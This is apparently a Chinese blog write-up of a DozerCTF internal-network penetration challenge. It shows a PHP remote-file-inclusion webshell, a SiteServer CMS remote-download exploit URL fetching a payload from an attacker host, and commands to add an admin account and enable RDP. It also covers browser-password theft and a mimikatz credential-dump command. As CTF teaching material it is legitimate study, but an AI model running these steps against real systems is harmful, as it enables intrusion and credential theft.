DozerCTF域渗透

·
CTFWP 内网渗透 no tag June 3, 2021

flag1

打完XCTF final,发现dozer也在办比赛,其中有一道渗透题目,感觉值得细致研究一下。

进去一看是lightcms

image-20210601081335352

由此想到了前几天红帽杯郭院士出的题目。

先dozer/dozer123登录后台。

在GitHub上可以搜索到任意文件读取的漏洞。

image-20210601083809927

image-20210601083817633

有任意文件读取,于是我们读一下原漏洞文件

image-20210601090218013

发现它多了一个testInclude

    public function testInclude(Request $request)
    {
        $file = $request->has('file') ? $request->get('file') : 'index.php';
    @include('/var/www/html/public/'.$file);

然后可以用http协议远程下载一个带马的jpg

image-20210601084543961

image-20210601090449361

即可getshell

image-20210601093635758

flag1:Dozerctf{k94jf8ejdbzks2l4o40rjdnfewrkyosd}

flag2

之后上传一个viper马,viper上线。上线后做一个路由。代理出来扫描内网

image-20210601181141026

进去之后发现有台234的机器

访问http://10.10.1.234/robots.txt

发现

User-agent: *
Disallow: /SiteServer/
Disallow: /SiteFiles/
Disallow: /home/

说明是SiteServer

查查SiteServer的漏洞

https://github.com/zhaoweiho/SiteServer-CMS-Remote-download-Getshell

上传到跳板机

image-20210602092255661

再起一个http服务。

image-20210602092840495

先加密一下

using System; 
using System.IO; 
using System.Security.Cryptography; 
using System.Text; 
namespace EncryptApplication 
{ class Encrypt 
    { static void Main(string[] args) 
      { 
        var _encryptKey = "vEnfkn16t8aeaZKG3a4Gl9UUlzf4vgqU9xwh8ZV5"; 
        var _decryptKey = "vEnfkn16t8aeaZKG3a4Gl9UUlzf4vgqU9xwh8ZV5";
        var _inputString = "http://10.10.1.47:9001/poxteam.zip";
        var _outString = ""; var _noteMessage = "";
        byte[] iv = { 0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF };
        try{ 
           var byKey = Encoding.UTF8.GetBytes(_encryptKey.Length > 8 ? _encryptKey.Substring(0, 8) : _encryptKey); 
          var des = new DESCryptoServiceProvider(); 
          var inputByteArray = Encoding.UTF8.GetBytes(_inputString); 
          var ms = new MemoryStream(); 
          var cs = new CryptoStream(ms, des.CreateEncryptor(byKey, iv), CryptoStreamMode.Write);     cs.Write(inputByteArray, 0, inputByteArray.Length);
         cs.FlushFinalBlock();
          _outString = Convert.ToBase64String(ms.ToArray()); 
         Console.WriteLine("DesEncrypt:"); Console.WriteLine(_outString); }
      catch (Exception error) { _noteMessage = error.Message; } 
 } } }

用python脚本替换

str_decry = "ZjYIub/YxA05+dg8BqV7gWPgR82cOjhyE6hgZjPTM3/iCxJzxSm/yQ=="
str_decry = str_decry.replace("+", "0add0").replace("=", "0equals0").replace("&", "0and0").replace("?", "0question0").replace("/", "0slash0")

print(str_decry)

最后访问http://10.10.1.234//SiteServer/Ajax/ajaxOtherService.aspx?type=SiteTemplateDownload&userKeyPrefix=test&downloadUrl=ZjYIub0slash0YxA050add0dg8BqV7gWPgR82cOjhyE6hgZjPTM30slash0iCxJzxSm0slash0yQ0equals00equals0&directoryName=yang99

image-20210602093325020

访问该后门

image-20210602093942506

发现已经上线

拿到第二个flag

image-20210602094224812

flag2:DozerCTF{b59d9f9e843dedb09e407849f3396cb1}

flag3

查看web.config

<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <appSettings>
    <add key="IsProtectData" value="True" />
    <add key="DatabaseType" value="9XtLPj6oytMAr6M9jZ0Xvg0equals00equals0" />
    <add key="ConnectionString" value="Zg3p37CSquO0slash0DelgBGFVO0J0BlhMxqbj6HR98UP8h4kojeoW8A0slash0xZh4im63w0tn2nuW7n5XRcDo0equals0" />
  </appSettings>
  <system.web>
    <httpRuntime requestValidationMode="2.0" requestPathInvalidCharacters="" maxRequestLength="40960" executionTimeout="2000" useFullyQualifiedRedirectUrl="false" minFreeThreads="8" minLocalRequestFreeThreads="4" appRequestQueueLimit="100" enableVersionHeader="false" />
    <pages validateRequest="false" enableSessionState="true" enableViewState="true" enableEventValidation="false" controlRenderingCompatibilityVersion="4.0" clientIDMode="AutoID" />
    <customErrors mode="Off" />
    <sessionState mode="InProc" timeout="30" />
    <trace enabled="false" requestLimit="1000" pageOutput="true" traceMode="SortByTime" localOnly="true" />
    <globalization fileEncoding="utf-8" requestEncoding="utf-8" responseEncoding="utf-8" />
    <compilation debug="false" />
  </system.web>
  <system.webServer>
    <modules>
      <!--iisnode默认不支持PUT和DELETE的解决-->
      <remove name="WebDAVModule" />
      <!--路由模型删掉再加一次-->
      <remove name="UrlRoutingModule-4.0" />
      <add name="UrlRoutingModule-4.0" type="System.Web.Routing.UrlRoutingModule" preCondition="" />
      <add name="ErrorRedirectModule" type="SiteServer.API.ErrorRedirectModule, SiteServer.API" />
    </modules>
    <handlers>
      <remove name="ExtensionlessUrlHandler-Integrated-4.0" />
      <remove name="OPTIONSVerbHandler" />
      <remove name="TRACEVerbHandler" />
      <add name="ExtensionlessUrlHandler-Integrated-4.0" path="*." verb="*" type="System.Web.Handlers.TransferRequestHandler" preCondition="integratedMode,runtimeVersionv4.0" />
    </handlers>
  </system.webServer>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-9.0.0.0" newVersion="9.0.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Http" publicKeyToken="31bf3856ad364e35" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-5.2.3.0" newVersion="5.2.3.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Net.Http.Formatting" publicKeyToken="31bf3856ad364e35" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-5.2.3.0" newVersion="5.2.3.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="Microsoft.Owin" publicKeyToken="31bf3856ad364e35" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-2.1.0.0" newVersion="2.1.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Cors" publicKeyToken="31bf3856ad364e35" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-5.2.3.0" newVersion="5.2.3.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="Microsoft.AspNet.SignalR.Core" publicKeyToken="31bf3856ad364e35" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-2.2.1.0" newVersion="2.2.1.0" />
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
</configuration>

根据key DES解密一下

image-20210602105753760

得到server=10.10.1.231;uid=sa;pwd=msO.9uXC;database=site

msf先登录

image-20210602202002010

然后执行一下命令

image-20210602202454148

flag在Administrator的桌面下

image-20210602203020638

拿到第三个flag

flag4

之后新建用户

net user yang99 test@123.com /add
net localgroup Administrators yang99 /add

开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

有报错就

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

然后远程桌面连

image-20210603095115153

然后发现Adminitrator的桌面上有

image-20210603144059516

DozerOCS,分析一下它的内存得到用户名Alice FkuWvj08

用这个账户密码登录10.10.1.121。

image-20210603152445143

由于个人PC没有开3389端口,于是用工具PsExec64.exe连接到Alice的PC

image-20210603144558777

第四个flag在Alice的桌面上。

image-20210603152403286

flag5

然后可以传一个hack-browser-data.exe上去,查看ALICE的浏览器记录。

image-20210603152757841

发现了有密码

image-20210603154210022

Alice Alice@Dozer@2021

登录后台

image-20210603211713664

写shell后查看flag

image-20210603212744778

image-20210603215106112

加个用户,连接一下,上个mimikatz

image-20210603221726503

mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

获得hash

  • 津门杯 Web
  • CISCN Web 复现
取消回复

说点什么?

© 2023 Yang_99的小窝. Using Typecho & Moricolor.